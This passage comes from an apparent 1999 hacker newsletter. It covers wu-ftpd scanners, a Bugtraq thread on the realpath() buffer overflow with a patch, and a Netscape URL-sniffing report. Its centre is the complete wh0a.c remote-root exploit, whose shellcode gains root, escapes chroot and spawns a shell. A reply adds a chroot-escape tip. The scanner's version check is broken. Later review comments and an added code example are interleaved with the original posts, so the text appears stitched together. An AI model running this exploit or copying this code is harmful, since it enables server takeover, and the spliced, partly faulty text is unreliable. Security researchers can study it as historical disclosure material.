- venomous@iname.com - o3/99 )]>"); printf("<[( usage:\n"); printf("<[( %s -f file [-p port] [-o]\n\n",damn); printf("<[( -f file: file is the IPs file.\n"); printf("<[( -p port: port to connect to, default 21.\n"); printf("<[( -o: with this flag, ftpscan will log into the FTPserver\n"); printf("<[( as anonymous, and do a recursive list.\n\n"); exit(0); } -----[ end of ftpscan.c ]----- -----[ cut here, blah.h ]----- #include #include #include #include #include #include #include #include #include #define NOMBRESIZE 16 struct ifmap { unsigned long mem_start; unsigned long mem_end; unsigned short base_addr; unsigned char irq; unsigned char dma; unsigned char port; /* 3 bytes spare */ }; struct ifreq { union { char ifrn_name[NOMBRESIZE]; /* if name, e.g. "en0" */ } ifr_ifrn; union { struct sockaddr ifru_addr; struct sockaddr ifru_dstaddr; struct sockaddr ifru_broadaddr; struct sockaddr ifru_netmask; struct sockaddr ifru_hwaddr; short ifru_flags; int ifru_metric; int ifru_mtu; struct ifmap ifru_map; char ifru_slave[NOMBRESIZE]; /* Just fits the size */ caddr_t ifru_data; } ifr_ifru; }; #define ifr_name ifr_ifrn.ifrn_name /* interface name */ #define ifr_hwaddr ifr_ifru.ifru_hwaddr /* MAC address */ #define ifr_addr ifr_ifru.ifru_addr /* address */ #define ifr_dstaddr ifr_ifru.ifru_dstaddr /* other end of p-p lnk */ #define ifr_broadaddr ifr_ifru.ifru_broadaddr /* broadcast address */ #define ifr_netmask ifr_ifru.ifru_netmask /* interface net mask */ #define ifr_flags ifr_ifru.ifru_flags /* flags */ #define ifr_metric ifr_ifru.ifru_metric /* metric */ #define ifr_mtu ifr_ifru.ifru_mtu /* mtu */ #define ifr_map ifr_ifru.ifru_map /* device map */ #define ifr_slave ifr_ifru.ifru_slave /* slave device */ #define ifr_data ifr_ifru.ifru_data /* for use by interface */ struct ifconf { int ifc_pum; /* size of buffer */ union { caddr_t ifcu_buf; struct ifreq *ifcu_req; } ifc_ifcu; }; #define ifc_buf ifc_ifcu.ifcu_buf /* buffer address */ #define ifc_req ifc_ifcu.ifcu_req /* array 
of structures */ -----[ end of blah.h ]----- Have fun! @HWA 26.0 WuFTP scanner ~~~~~~~~~~~~~ /* This is probably more script-kiddie-ish than the last wu-ftpd scanner, but with almost no modifications you can make Lord Somer's IMAPVuln into a scanner that will look for anything, probably no point in putting it on the page, I'm sure someone will code one from scratch. - SellOut */ /* IMAPVuln Scanner By: Lord Somer Scans the ips in a file to see if they run a vulnerable version of imap then output to a file Checks if ver is 9.0, 10.166, 10.171, 10.183, 10.190, 10.205, 10.223, 10.233 Thanks to guy who made statd scanner, warchld for some of the other vulnerable version #'s. */ #include #include #include #include #include #include #include #include #include #include #include /* connect_timeo taken from mscan by jsbach */ #define TIMEOUT 5 #include #include #ifdef LINUX #include #endif typedef void Sigfunc (int); void connect_alarm(int signo); int connect_timeo(int sockfd, struct sockaddr *saptr, int salen, int nsec) { int n; alarm(0); signal(SIGALRM,connect_alarm); alarm(TIMEOUT); if( (n = connect(sockfd, (struct sockaddr *) saptr, salen)) < 0) { close(sockfd); if(errno == EINTR) errno = ETIMEDOUT; } alarm(0); signal(SIGALRM, SIG_DFL); return(n); } void connect_alarm(int signo) { return; } /* end jsbach's code */ void usage(char *s) { printf("Original Usage"); printf("IMAPVuln Scanner v1.0\n"); printf("Usage: %s \n",s); printf(" By: Lord Somer \n"); printf(" Check out efnet #sploits and\nThe Hackers Layer http://www.lordsomer.com\n"); printf("This is modified to scan for, probably, exploitable wu-ftpds, same syntax.\n"); exit(-1); } unsigned long int res(char *p) { struct hostent *h; unsigned long int rv; h=gethostbyname(p); if(h!=NULL) memcpy(&rv,h->h_addr,h->h_length); else rv=inet_addr(p); return rv; } void imapscan(char *i, char *o) { FILE *iff, *of; char buf[512]; if((iff=fopen(i,"r")) == NULL) return; while(fgets(buf,512,iff) != NULL) { 
if(buf[strlen(buf)-1]=='\n') buf[strlen(buf)-1]=0; if(imapvuln(buf) == 1 && (of=fopen(o,"a")) != NULL) { buf[strlen(buf)+1]=0; buf[strlen(buf)]='\n'; fputs(buf,of); fclose(of); } } fclose(iff); } int imapvuln(char *host) { int sockfd; int len; struct sockaddr_in address; int result; char buffer[200]; sockfd = socket(AF_INET, SOCK_STREAM, 0); address.sin_family = AF_INET; address.sin_addr.s_addr = res(host); address.sin_port = htons(21); len = sizeof(address); if (connect_timeo(sockfd, (struct sockaddr *)&address, len, 2) == -1) { /* Host timed out, thus not vulnerable */ close(sockfd); return 0; } result = read(sockfd, buffer, sizeof(buffer)); /* * We look for all versions that we know are vulnerable, i did it this way so it's easy to add * in new versions that an exploit comes out for. */ /* This is the only part I had to change, except for the port. I based what it looks for on the comments by Gregory A Lundberg on BugTraq, we could get very specific here, but for times sake I don't think we need to. - SellOut */ if (strstr(buffer,"Version wu-2.4.2-academ[BETA-1")); { close(sockfd); return 1; } close(sockfd); return 0; } int main(int argc, char **argv) { if (argc < 3) usage(argv[0]); imapscan(argv[1], argv[2]); return 1; } @HWA 27.0 The Wu-FTPd exploit and patch thread ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
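The thread that follows turns on one pattern: realpath() concatenates path pieces and then strcpy()s them into a MAXPATHLEN-sized result, and the MKD handler uses the buffer without checking the return value. The C below is an added example, not wu-ftpd code and not written by anyone in the thread; EX_MAXPATHLEN and all function names are hypothetical, and the inputs are constructed. It shows a join that checks the total length before writing a byte and a caller that never reads the buffer on failure.

```c
/* Added example, not wu-ftpd source. EX_MAXPATHLEN and every function
 * name here are hypothetical; the inputs in main() are constructed. */
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define EX_MAXPATHLEN 1024  /* stand-in for the daemon's MAXPATHLEN */

/* Copy src into dst (capacity cap, NUL included). strncpy(dst, src, cap)
 * leaves dst unterminated when strlen(src) >= cap; this refuses instead. */
int copy_checked(char *dst, size_t cap, const char *src)
{
    size_t n = strlen(src);

    if (n >= cap) {
        if (cap > 0)
            dst[0] = '\0';
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Build "dir/name" in result, which must not overlap dir or name.
 * The length is checked before any byte is written, so there is no
 * concatenate-then-strcpy step to overflow. On failure result is "". */
int join_checked(char *result, size_t cap, const char *dir, const char *name)
{
    size_t dlen = strlen(dir), nlen = strlen(name);
    size_t sep = (dlen > 0 && dir[dlen - 1] != '/') ? 1 : 0;

    if (cap == 0) {
        errno = EINVAL;
        return -1;
    }
    /* need dlen + sep + nlen + 1 <= cap, tested without wrapping size_t */
    if (dlen >= cap || nlen >= cap - dlen || dlen + sep + nlen >= cap) {
        result[0] = '\0';
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(result, dir, dlen);
    if (sep)
        result[dlen++] = '/';
    memcpy(result + dlen, name, nlen + 1);
    return 0;
}

/* An MKD-style caller: the 257 reply carries the absolute path only when
 * the join succeeded; on failure the path buffer is never read.
 * Returns the reply code and writes the reply text to out. */
int mkd_reply(char *out, size_t outcap, const char *cwd, const char *arg)
{
    char path[EX_MAXPATHLEN];

    if (join_checked(path, sizeof path, cwd, arg) < 0) {
        snprintf(out, outcap, "550 path too long.");
        return 550;
    }
    snprintf(out, outcap, "257 \"%s\" new directory created.", path);
    return 257;
}

/* Models nested directories whose names are each acceptable but whose
 * total grows past the buffer, as in the syslog excerpt in the thread.
 * Returns the depth at which the join is first refused, 0 if it never
 * is within max_depth, -1 on bad input. */
int first_refused_depth(size_t comp_len, int max_depth)
{
    char cwd[EX_MAXPATHLEN], next[EX_MAXPATHLEN], comp[256];
    int depth;

    if (comp_len == 0 || comp_len >= sizeof comp)
        return -1;
    memset(comp, 'A', comp_len);
    comp[comp_len] = '\0';
    copy_checked(cwd, sizeof cwd, "/foo");

    for (depth = 1; depth <= max_depth; depth++) {
        if (join_checked(next, sizeof next, cwd, comp) < 0)
            return depth;
        copy_checked(cwd, sizeof cwd, next);
    }
    return 0;
}

int main(void)
{
    char reply[EX_MAXPATHLEN + 64];

    mkd_reply(reply, sizeof reply, "/home/ftp", "incoming");
    puts(reply);
    printf("100-byte components refused at depth %d\n",
           first_refused_depth(100, 50));
    return 0;
}
```

The point to carry into the thread: truncating with strncpy() hides the error from the caller, while refusing with ENAMETOOLONG lets the MKD handler answer without ever touching a half-built path.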
From: owner-wu-ftpd@wugate.wustl.edu [mailto:owner-wu-ftpd@wugate.wustl.edu] On Behalf Of Gregory A Lundberg
Sent: Tuesday, March 23, 1999 10:44 AM
To: Russ Allbery
Cc: ayu1@nycap.rr.com; wu-ftpd@wugate.wustl.edu
Subject: Re: FW: ftp exploit

On 23 Mar 1999, Russ Allbery wrote:

> > any comments?
>
> It's an exploit script for the path overflow bug that's already been
> announced by CERT, been on all the security lists, and has already
> been fixed in the latest version of every wu-ftpd variant that I'm
> aware of as well as being the impetus for the final mainline wu-ftpd
> release?

Correct. This is a full exploit against Redhat 5.2 (the original advisory was based upon a test, not an exploit).

My comment: This posting proves why you need to keep up with the CERT mailing list, if not Bugtraq and other lists. As often happens, the exploit followed the discovery of the vulnerability by several weeks. While it sometimes happens that exploits are distributed before the daemon authors are notified and public security announcement made, this was not the case here.

My testing shows:

This is an exploit using the buffer overflow described in

    CERT Advisory CA-99.03 - FTP-Buffer-Overflows
    Available from htp://www.CERT.org/

It is directed solely at Redhat CD 4.2 Linux systems running a clean, default install. It was not successful on unclean 5.2 systems, the pre-5.2 systems I tested on, or when I built the daemon by-hand instead of using a Redhat (S)RPM. My testing showed, while none of the systems I have available were exploitable, the exploit WOULD HAVE WORKED but failed for identifiable reasons.

Given working code for Redhat 4.2, it should be a fairly simple matter to port to non-Linux or non-5.2 systems.

WHO IS VULNERABLE
-----------------

- Systems running ALL versions of WU-FTPD _prior_ to 2.4.2 (final), including all 2.4.2-beta versions, ARE VULNERABLE, except as noted below:

- Systems with proper upload clauses are partially protected. Many systems do not use proper upload clauses for real/guest users and are NOT protected from abuse by their local users.

- Systems with proper permissions are partially protected. Most systems do not use proper permissions for real/guest users since they would prevent use by Telnet/SSH/Shell .. such systems are NOT protected from their local users.

WHO IS NOT VULNERABLE
---------------------

- Systems running 2.4.2 (final) are protected against _this_ bug. Such systems should upgrade to VR16 for maximum security; a number of other bugs and security problems have been fixed in VR16.

- Systems running 2.4.2-beta-18-VR10 or later are protected. Anyone running VR10 through VR13 should upgrade to VR14 or later at your earliest convenience.

- Systems running BeroFTPD 1.2.0 or later are NOT vulnerable. All BeroFTPD systems should upgrade to the current version (1.3.4) at their earliest convenience. Anyone running a vulnerable system with NEWVIRT will want to immediately upgrade to BeroFTPD.

The location of the latest version of wu-ftpd can be found in the directory

    ftp://ftp.vr.net/pub/wu-ftpd/

wu-ftpd Resource Center: http://www.landfield.com/wu-ftpd/
wu-ftpd FAQ: http://www.cetis.hvu.nl/~koos/wu-ftpd-faq.html
wu-ftpd list archive: http://www.landfield.com/wu-ftpd/mail-archive/

--

Gregory A Lundberg              Senior Partner, VRnet Company
1441 Elmdale Drive              lundberg+wuftpd@vr.net
Kettering, OH 45409-1615 USA    1-800-809-2195

------------------------------------------------------------------------------

Date: Thu, 25 Mar 1999 22:17:33 -0500
From: Gregory A Lundberg
To: BUGTRAQ@netspace.org
Subject: Re: wu-ftpd overflow.

On Sun, 21 Mar 1999, CyberPsychotic wrote:

> (cc'ed to bugtraq since I haven't seen yet any patches fixing this
> problem were posted there)

Yes, the exploit recently posted to Bugtraq takes advantage of the realpath() buffer overflows .. as they exist in the Redhat RPM version shipped on their 5. CD. The exploit may require some modification to be successfully used against other Linux/Intel systems and, of course, will need major changes to be used against other hardware or software platforms.

About the exploit posted on Bugtraq: my read-through of the shows it does use the vulnerability through the MKD command. You are correct that some Academ beta versions do not use the source-provided vulnerable realpath() function for MKD. ISTM it should be fairly easy to modify the exploit to make use of other commands where a given Academ beta version _does_ use realpath().

Remember, the exploit is an _example_ of the problem, it does not reveal the true magnitude of the vulnerability. A positive test proves vulnerability while a negative test proves nothing. The vulnerable and non-vulnerable versions were outlined in the advisories which _were_ posted on Bugtraq.

The realpath() problem was openly discussed on Bugtraq weeks (months? .. I'd have to look through the Bugtraq archives again) before the release of the advisories. The actively maintained versions of the wu-ftpd daemon were immediately corrected as a result of the realpath() vulnerability discussions on Bugtraq, so they had been corrected for quite some time prior to Netect's research indicating there may be a problem.

At the time of publication of the Netect/CERT Advisories, patches for wu-ftpd were unnecessary since the current, maintained, versions were not vulnerable.

My patch file for wu-ftpd, which corrects the problem, is presently 644162 bytes in length, fixes several hundred other problems with the daemon, and is available via FTP from ftp://ftp.vr.net/pub/wu-ftpd/ for those silly enough to want it (I rather doubt it Aleph would allow it through to the Bugtraq the mailing list). I am not inclined to pull out the patches for realpath() because the entire pile of male bovine by-product was replaced.

A patch file for the other major, maintained, version of wu-ftpd (BeroFTPD) is not available at all. Since today it would probably run well over 1 Meg, the maintainer sees no point in the fiction of 'patching'. He is also dis-inclined to pull out the realpath() changes since he and I co-operated on the complete replacement of the function (actually he did most of the initial work; I just debugged it).

At about the time of the Netect/CERT Advisories Redhat released updated RPMs for the vulnerable Academ 2.4.2-betas they distribute. I don't know whether they released before or after, but I do recall it was just a few hours before their availability was discussed on Bugtraq.

Other versions (from wu-stl and academ) are not actively maintained and should not be used in production environments.

Anyone running versions of wu-archive / the wu-ftpd daemon older than Academ's 2.4.2-beta-18 has more severe problems than this buffer overrun, so I see no point posting the patch. For them the correct solution is either updating to a more current version or manual operation of the power switch.

The only current version still vulnerable when the CERT advisory was issued was the Academ version 2.4.2-beta-18, which is (almost) not actively maintained. A week or two following the CERT advisory Academ silently released 2.4.2 (final).

My knowledge of the code, and my direct research indicates:

The 2.4.2 (final) version does not completely solve the problem. Nor does your patch. (Nor, for that matter, does the Redhat patch but that's a moot point since their patch does fix the problem for their Linux systems.)

For systems using the realpath() function supplied with the source kit, a patch will work to correct, or at least hide, most, if not all, of the vulnerability.

For other systems, whether or not the daemon is vulnerable depends upon whether or not your vendor-supplied realpath() function is vulnerable (back to the original discussion on Bugtraq).

The only change here from my recommendations appearing in the Netect and CERT advisories is that the number of potentially vulnerable systems has been reduced by those using the daemon-supplied realpath() function to only those with vendor-supplied vulnerable realpath() functions.

To determine if your daemon uses the supplied function, look in /src/config/config. for a line reading something like:

    #define realpath realpath_on_steroids

If this #define does NOT appear, contact your vendor concerning the vulnerability of the realpath() function, or upgrade to a more-current version of the daemon (yes, there are versions much more current than Academ's 2.4.2/final).

Those wishing further information may contact me via the wu-ftpd support mailing list at mailto:wu-ftpd@wugate.wustl.edu .. subscription and unsubscription information for that mailing list are in the FAQ.

The location of the latest versions of wu-ftpd can be found in the directory

    ftp://ftp.vr.net/pub/wu-ftpd/

wu-ftpd Resource Center: http://www.landfield.com/wu-ftpd/
wu-ftpd FAQ: http://www.cetis.hvu.nl/~koos/wu-ftpd-faq.html
wu-ftpd list archive: http://www.landfield.com/wu-ftpd/mail-archive/

(The html version of the wu-ftpd list archive is currently not working, use the Unix mailbox format instead.)

--

Gregory A Lundberg              Senior Partner, VRnet Company
1441 Elmdale Drive              lundberg+wuftpd@vr.net
Kettering, OH 45409-1615 USA    1-800-809-2195

------------------------------------------------------------------------------

Date: Sun, 21 Mar 1999 18:21:22 +0500
From: CyberPsychotic
To: BUGTRAQ@netspace.org
Subject: wu-ftpd overflow.

~ Has some1 located the file/function where
~ the overflow takes place ?

Yes. I think overflow takes place in function realpath.c: look at the end of the function realpath(), which first concatenates everything together and then just does strcpy into result variable, which is pointer to buffer sized of MAXPATHLEN. You could either overflow workpath variable in realpath, or, if your buffer is not too fat, it will be overflowed later, when function makedir returns (called from ftpcmd). In either case return address gets overflowed and it returns nowhere (or to your exploit code if you put there such, no big deal).

I've made a couple of fixes to ftpd daemon to generate debugging info via syslog, so here's what I have:

Mar 21 12:21:46 gear ftpd[21737]: ftpcmd:1294 (ftpcmd called makedir)
Mar 21 12:21:46 gear ftpd[21737]: before 3180 (calling realpath line 3128)
Mar 21 12:21:46 gear ftpd[21737]: overflow:180 (here overflow takes place)
Mar 21 12:21:46 gear ftpd[21737]: overflow:210 (again.
It's being copied twice) Mar 21 17:21:47 gear syslogd: Cannot glue message parts together Mar 21 12:21:46 gear ftpd[21737]: after 3180 (realpath line 3128 returns) /foo/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Mar 21 17:21:47 gear AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Mar 21 12:21:47 gear ftpd[21737]: exiting on signal 11 oops..... now it attempted to execute piece at 0x41414141 addy.. Some previous beta releases of wu-ftpd are NOT vulneriable to this thing because they just don't call realpath function (which does overflow) from makedir() function. Here's quick patch I've done to this piece (cc'ed to bugtraq since I haven't seen yet any patches fixing this problem were posted there): --/cut here/-- --- ftpd.c.orig Mon Jul 6 15:14:25 1998 +++ ftpd.c Sun Mar 21 18:17:52 1999 
@@ -3146,19 +3146,24 @@ if (mkdir(name, 0777) < 0) { if (errno == EEXIST){ - realpath(name, path); - reply(521, "\"%s\" directory exists", path); + if(realpath(name, path)) + reply(521, "\"%s\" directory exists.", path); + else reply(521,"path too long."); }else perror_reply(550, name); return; } - realpath(name, path); /* According to RFC 959: * The 257 reply to the MKD command must always contain the * absolute pathname of the created directory. * This is implemented here using similar code to the PWD command. * XXX - still need to do `quote-doubling'. */ + if(!realpath(name, path)) + if (strlen(path)!=0) + reply(257,"\"%s\" directory created name truncated.",path); + else reply(500,"no directory created. Path too long."); + else reply(257, "\"%s\" new directory created.", path); } --- realpath.c.orig Sun Mar 21 17:29:42 1999 +++ realpath.c Sun Mar 21 18:08:28 1999 @@ -40,6 +40,7 @@ #include #include #include +#include #ifndef HAVE_SYMLINK #define lstat stat @@ -55,10 +56,10 @@ #endif { struct stat sbuf; - char curpath[MAXPATHLEN], - workpath[MAXPATHLEN], - linkpath[MAXPATHLEN], - namebuf[MAXPATHLEN], + char curpath[MAXPATHLEN+1], + workpath[MAXPATHLEN+1], + linkpath[MAXPATHLEN+1], + namebuf[MAXPATHLEN+1], *where, *ptr, *last; @@ -75,7 +76,7 @@ return(NULL); } - strcpy(curpath, pathname); + strncpy(curpath, pathname,MAXPATHLEN); if (*pathname != '/') { uid_t userid; @@ -93,7 +94,7 @@ #else if (!getwd(workpath)) { #endif - strcpy(result, "."); + strncpy(result, ".",MAXPATHLEN); seteuid(userid); enable_signaling(); /* we can allow signals once again: kinch */ return (NULL); 
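Review bot: in the ftpd.c makedir() hunk, the new failure branch replies 500 "no directory created. Path too long." after mkdir(name, 0777) has already succeeded, so the directory exists on disk while the client is told it does not. If over-long paths are to be refused, do the length check before mkdir(), or rmdir() the new directory on this branch; otherwise send 257 with the name as given. The nested if / if / else / else is written without braces, which makes the pairing easy to misread on the next edit, so brace both levels. The strlen(path) test also assumes realpath() wrote something into path before returning NULL, which the visible lines do not guarantee.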
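Review bot: in the realpath.c hunk at -75,7, strncpy(curpath, pathname, MAXPATHLEN) writes no terminating NUL when pathname is MAXPATHLEN bytes or longer, and curpath is an automatic array that nothing shown here zeroes, so the extra byte gained by the MAXPATHLEN+1 resize is not guaranteed to be '\0'. Set curpath[MAXPATHLEN] = '\0' after the copy, or better, return NULL up front when strlen(pathname) >= MAXPATHLEN, because a silent truncation resolves a different path from the one the client named.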
@@ -142,9 +143,13 @@ for (last = namebuf; *last; last++) continue; if ((last == namebuf) || (*--last != '/')) - strcat(namebuf, "/"); - strcat(namebuf, where); - + strncat(namebuf, "/",MAXPATHLEN-strlen(namebuf)); + strncat(namebuf, where,MAXPATHLEN-strlen(namebuf)); + if (strlen(namebuf)+strlen(where)>=MAXPATHLEN) { + syslog(LOG_DAEMON|LOG_NOTICE,"possible buffer overflow attempt"); + return(NULL); + } + where = ++ptr; if (lstat(namebuf, &sbuf) == -1) { strcpy(result, namebuf); @@ -163,8 +168,13 @@ if (*linkpath == '/') *workpath = '\0'; if (*where) { - strcat(linkpath, "/"); - strcat(linkpath, where); + strncat(linkpath, "/",MAXPATHLEN-strlen(linkpath)); + strncat(linkpath, where,MAXPATHLEN-strlen(linkpath)); + if (strlen(namebuf)+strlen(where)>=MAXPATHLEN) { + syslog(LOG_DAEMON|LOG_NOTICE, + "possible buffer overflow attempt"); + return(NULL); + } } strcpy(curpath, linkpath); goto loop; @HWA 28.0 wh0a.c wu-FTPd beta exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Thu, 25 Mar 1999 15:42:47 +0100 
From: Pieter Nieuwenhuijsen To: BUGTRAQ@netspace.org Subject: another ftp exploit /* wu-ftpd mkdir v2.4.2-beta18 remote rewt spl01t v1.20 ( linux x86 ) by joey__ of rhino9 - 2/20/99 big thx horizon, duke, nimrood and icee sh0utz neonsurge, xaphan, joc, sri, aalawaka, and aakanksha USAGE: ( ./wh0a [ initialdir ] [ ] [ ] ; cat ) | nc */ #include char x86_shellcode0[156] = "\x83\xec\x04" /* sub esp,4 */ /* esi -> local variables and data */ "\x5e" /* pop esi */ "\x83\xc6\x70" /* add esi,0x70 */ "\x83\xc6\x20" /* add esi,0x20 */ "\x8d\x5e\x0c" /* lea ebx,[esi+0x0c] */ /* decode the strings */ "\x31\xc9" /* xor ecx, ecx */ "\xb1\x30" /* mov cl,0x30 */ "\x80\x2b\x32" /* sub byte ptr [ebx],0x32 */ "\x43" /* inc ebx */ "\x49" /* dec ecx */ "\x75\xf9" /* jnz short decode_next_byte */ "\x31\xc0" /* xor eax,eax */ /* setuid ( 0 ) */ "\x89\xc3" /* mov ebx,eax */ "\xb0\x17" /* mov al,0x17 */ "\xcd\x80" /* int 0x80 */ "\x31\xc0" /* xor eax,eax */ /* setgid ( 0 ) */ "\x89\xc3" /* mov ebx,eax */ "\xb0\x2e" /* mov al,0x2e */ "\xcd\x80" /* int 0x80 */ /* To break chroot we have to... fd = open ( ".", O_RDONLY ); mkdir ( "hax0r", 0666 ); chroot ( "hax0r" ); fchdir ( fd ); for ( i = 0; i < 254; i++ ) chdir ( ".." ); chroot ( "." 
); */ "\x31\xc0" /* xor eax,eax */ /* var0 = open ( ".", O_RDONLY ) */ "\x31\xc9" /* xor ecx,ecx */ "\x8d\x5e\x0f" /* lea ebx,[esi+0x0f] */ "\xb0\x05" /* mov al,0x05 */ "\xcd\x80" /* int 0x80 */ "\x89\x06" /* mov [esi],eax */ "\x31\xc0" /* xor eax,eax */ /* mkdir ( "hax0r", 0666 ) */ "\x8d\x5e\x11" /* lea ebx,[esi+0x11] */ "\x8b\x4e\x1f" /* mov ecx,[esi+0x1f] */ "\xb0\x27" /* mov al,0x27 */ "\xcd\x80" /* int 0x80 */ "\x31\xc0" /* xor eax,eax */ /* chroot ( "hax0r" ) */ "\x8d\x5e\x11" /* lea ebx,[esi+0x11] */ "\xb0\x3d" /* mov al,0x3d */ "\xcd\x80" /* int 0x80 */ "\x31\xc0" /* xor eax,eax */ /* fchdir ( fd ) */ "\x8b\x1e" /* mov ebx,[esi] */ "\xb0\x85" /* mov al,0x85 */ "\xcd\x80" /* int 0x80 */ "\x31\xc9" /* xor ecx, ecx */ /* for ( i = 0; i < 254; i++ ) { */ "\xb1\xfe" /* mov cl,0xfe */ "\x31\xc0" /* xor eax,eax */ /* chdir ( ".." ) */ "\x8d\x5e\x0c" /* lea ebx,[esi+0x0c] */ "\xb0\x0c" /* mov al,0x0c */ "\xcd\x80" /* int 0x80 */ "\x49" /* dec ecx */ /* } */ "\x75\xf4" /* jnz short goto_parent_dir */ "\x31\xc0" /* xor eax,eax */ /* chroot ( "." ) */ "\x8d\x5e\x0f" /* lea ebx,[esi+0x0f] */ "\xb0\x3d" /* mov al,0x3d */ "\xcd\x80" /* int 0x80 */ "\x31\xc0" /* xor eax,eax */ /* execve ( "/bin/sh", "xxxxx", NULL ) */ "\x8d\x5e\x17" /* lea ebx,[esi+0x17] */ "\x8d\x4e\x04" /* lea ecx,[esi+0x04] */ "\x8d\x56\x08" /* lea edx,[esi+0x08] */ "\x89\x19" /* mov [ecx],ebx */ "\x89\x02" /* mov [edx],eax */ "\xb0\x0b" /* mov al, 0x0b */ "\xcd\x80" /* int 0x80 */ "\x31\xdb" /* xor ebx,ebx */ /* exit ( 0 ) */ "\x89\xd8" /* mov eax,ebx */ "\x40" /* inc eax */ "\xcd\x80" /* int 0x80 */ "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "var0" /* local variable integer */ "cmd0" /* char *cmd[2] */ "cmd1"; char x86_shellcode1[1024] = ".." "\x00" "." 
"\x00" "hax0r" "\x00" "/bin/sh" "\x00" "\xb6\x01\x00\x00"; char vardir[300]; int varlen; main ( int argc, char **argv ) { char *username, *password, *initialdir; int bufoffset, codeaddr, i, j, *pcodeaddr; if ( argc > 1 ) initialdir = argv[1]; else initialdir = "/incoming"; if ( argc > 3 ) { username = argv[2]; password = argv[3]; } else { username = "anonymous"; password = "poon@ni.com"; } if ( argc > 5 ) { bufoffset = atoi ( argv[4] ); codeaddr = atoi ( argv[5] ); } else { bufoffset = 195; codeaddr = 0x0805ac81; } printf ( "user %s\n", username ); printf ( "pass %s\n", password ); printf ( "cwd %s\n", initialdir ); varlen = bufoffset - strlen ( initialdir ); for ( i = 0; i < varlen; i++ ) vardir[i] = 'x'; vardir[varlen] = 0; printf ( "mkd %s\n", vardir ); printf ( "cwd %s\n", vardir ); varlen = 210; for ( i = 0; i < varlen; i++ ) vardir[i] = 'x'; vardir[varlen] = 0; printf ( "mkd %s\n", vardir ); printf ( "cwd %s\n", vardir ); varlen = 210; for ( i = 0; i < varlen; i++ ) vardir[i] = 'x'; vardir[varlen] = 0; printf ( "mkd %s\n", vardir ); printf ( "cwd %s\n", vardir ); varlen = 170; for ( i = 0; i < varlen; i++ ) vardir[i] = 'x'; vardir[varlen] = 0; printf ( "mkd %s\n", vardir ); printf ( "cwd %s\n", vardir ); varlen = 250; for ( i = 0; i < varlen; i++ ) vardir[i] = 'x'; for ( i = 0; i < sizeof ( x86_shellcode0 ); i++ ) vardir[i] = x86_shellcode0[i]; j = 0; for ( i = sizeof ( x86_shellcode0 ); j < 32; i++ ) { vardir[i] = ( char ) ( x86_shellcode1[j++] + 0x32 ); } pcodeaddr = ( int * ) &( vardir[varlen] ); *pcodeaddr = codeaddr; vardir[varlen+4] = 0; printf ( "mkd %s\n", vardir ); } ---------------------------------------------------------------------- Date: Fri, 26 Mar 1999 14:08:25 +0200 
From: Artem Malyshev To: BUGTRAQ@netspace.org Subject: Re: another ftp exploit (fwd) > /* To break chroot we have to... > > fd = open ( ".", O_RDONLY ); > mkdir ( "hax0r", 0666 ); > chroot ( "hax0r" ); > fchdir ( fd ); > for ( i = 0; i < 254; i++ ) > chdir ( ".." ); > chroot ( "." ); > > */ Too complex for standart linux All we have to do to break chroot is: mkdir("/sh"); // we already have string "/sh" in memory as a part of // "/bin/sh" chroot("/sh"); chroot("../../../../../../../../../"); // a number of "../" here, // I used 0x10 Last string can be built is stack with a simple loop Tested on linux 2.2.1 -am @HWA 29.0 Netscape 4.51 allows url sniffing from another window , exploit and patch ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Thu, 25 Mar 1999 20:07:52 +0200 From: Georgi Guninski To: BUGTRAQ@netspace.org Subject: Netscape Communicator 4.51 allows sniffing of URLs from another window There is a bug in Netscape Communicator 4.51,4.5/Win95, 4.08/WinNT (probably others?), which allows sniffing URLs from another window. The exploit uses the ability to execute JavaScript code from specially designed URLs in the javascript console window, when an error is deliberately invoked. Demonstration and source is available at: http://www.nat.bg/~joro/b11.html (The exploit does not work if you are behind some versions of a squid proxy. If you do not see your URL in a message box, try 